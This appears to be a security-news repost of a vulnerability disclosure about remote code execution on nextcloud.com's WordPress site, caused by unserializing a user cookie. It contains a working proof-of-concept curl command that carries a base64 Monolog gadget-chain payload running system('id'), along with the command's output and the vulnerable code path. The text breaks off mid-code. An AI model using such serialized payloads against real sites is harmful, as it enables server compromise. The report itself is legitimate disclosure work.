๐ Nextcloud: RCE on Wordpress website
๐ก Newskategorie: Sicherheitslรผcken
๐ Quelle: vulners.com
There is a trivial to exploit Remote Code Execution on nextcloud.com due to unserializing user input. Proof of concept The following command will execute the system('id') command on the host. As gadget chain I've used Monolog which is included in the PodLove WordPress plugin used on nextcloud.com: curl -i -s -k -X $'GET' \ -H $'Host: nextcloud.com' \ -b $'nc_cookie_banner={\"essentials\":true,\"convenience\":false,\"statistics\":{\"matomo\":false},\"external_media\":{\"youtube\":false,\"vimeo\":false}}; wp-wpml_current_language=en; nc_form_fields=TzozNzoiTW9ub2xvZ1xIYW5kbGVyXEZpbmdlcnNDcm9zc2VkSGFuZGxlciI6NDp7czoxNjoiACoAcGFzc3RocnVMZXZlbCI7aTowO3M6MTA6IgAqAGhhbmRsZXIiO3I6MTtzOjk6IgAqAGJ1ZmZlciI7YToxOntpOjA7YToyOntpOjA7czoyOiJpZCI7czo1OiJsZXZlbCI7aToxMDA7fX1zOjEzOiIAKgBwcm9jZXNzb3JzIjthOjI6e2k6MDtzOjM6InBvcyI7aToxO3M6Njoic3lzdGVtIjt9fQ==' \ $'https://nextcloud.com/newsletter/' The last line of the response will contain the output of the id command: ``` uid=33(www-data) gid=33(www-data) groups=33(www-data) uid=33(www-data) gid=33(www-data) groups=33(www-data) ``` Vulnerable lines of code The unserialize call in the below code paths is performed on user-input. ($_COOKIE['nc_form_fields']) https://github.com/nextcloud/nextcloud-theme/blob/e6db0a90391ec94f9eb6d86e16dc16e36c5f4dd4/inc/ninjaforms.php#L114 ```php add_filter( 'ninja_forms_render_default_value', 'nc_change_nf_default_value', 10, 3 ); function nc_change_nf_default_value( $default_value, $field_type,... ...